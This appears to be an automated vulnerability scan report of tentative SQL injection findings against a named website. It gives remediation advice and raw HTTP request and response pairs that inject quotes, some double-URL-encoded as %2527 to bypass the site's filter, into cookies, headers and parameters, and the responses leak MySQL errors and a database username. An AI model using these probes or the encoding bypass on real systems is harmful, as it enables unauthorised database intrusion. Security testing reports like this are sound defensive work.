SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET / HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.bing.com/search?q=www.analyticspros.com&src=IE-SearchBox&Form=IE8SRC Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:52:24 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET / HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.bing.com/search?q=www.analyticspros.com&src=IE-SearchBox&Form=IE8SRC Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:52:26 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:52:27 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:52:27 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30611
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /about/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)' Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:37:55 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /about/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'' Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:37:56 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /administrator/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.google.com/search?hl=en&q=%2527 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:09:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /administrator/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.google.com/search?hl=en&q=%2527%2527 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:09:14 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 1ee73a388da0bb7ec3d7afe3beccac53=93b4d0d3c5817b851bdd0e6edb426ad7; path=/ Last-Modified: Sat, 06 Nov 2010 05:09:15 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 4718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /administrator/templates/khepri%2527/favicon.ico HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/administrator/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 404 Component not found Date: Sat, 06 Nov 2010 08:26:08 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 08:26:11 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /administrator/templates/khepri%2527%2527/favicon.ico HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/administrator/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 08:26:12 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog.html?utm_source=members-list&utm_medium=email&utm_campaign=monday-QnA&utm_link=main-promo-link HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:17:51 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:17:52 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:17:52 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30159
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:44:02 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
1.7. http://www.analyticspros.com/blog.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.analyticspros.com
Path:
/blog.html
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:05:34 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The utm_campaign parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the utm_campaign parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog.html?utm_source=members-list&utm_medium=email&utm_campaign=monday-QnA'&utm_link=main-promo-link HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:06:53 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog.html?utm_source=members-list&utm_medium=email&utm_campaign=monday-QnA''&utm_link=main-promo-link HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:06:53 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:06:56 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:06:57 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30090
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The utm_source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the utm_source parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the utm_source request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog.html?utm_source=members-list%2527&utm_medium=email&utm_campaign=monday-QnA&utm_link=main-promo-link HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:04:38 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog.html?utm_source=members-list%2527%2527&utm_medium=email&utm_campaign=monday-QnA&utm_link=main-promo-link HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:04:39 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:04:42 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:04:42 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30094
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utma cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/55-googleanalytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
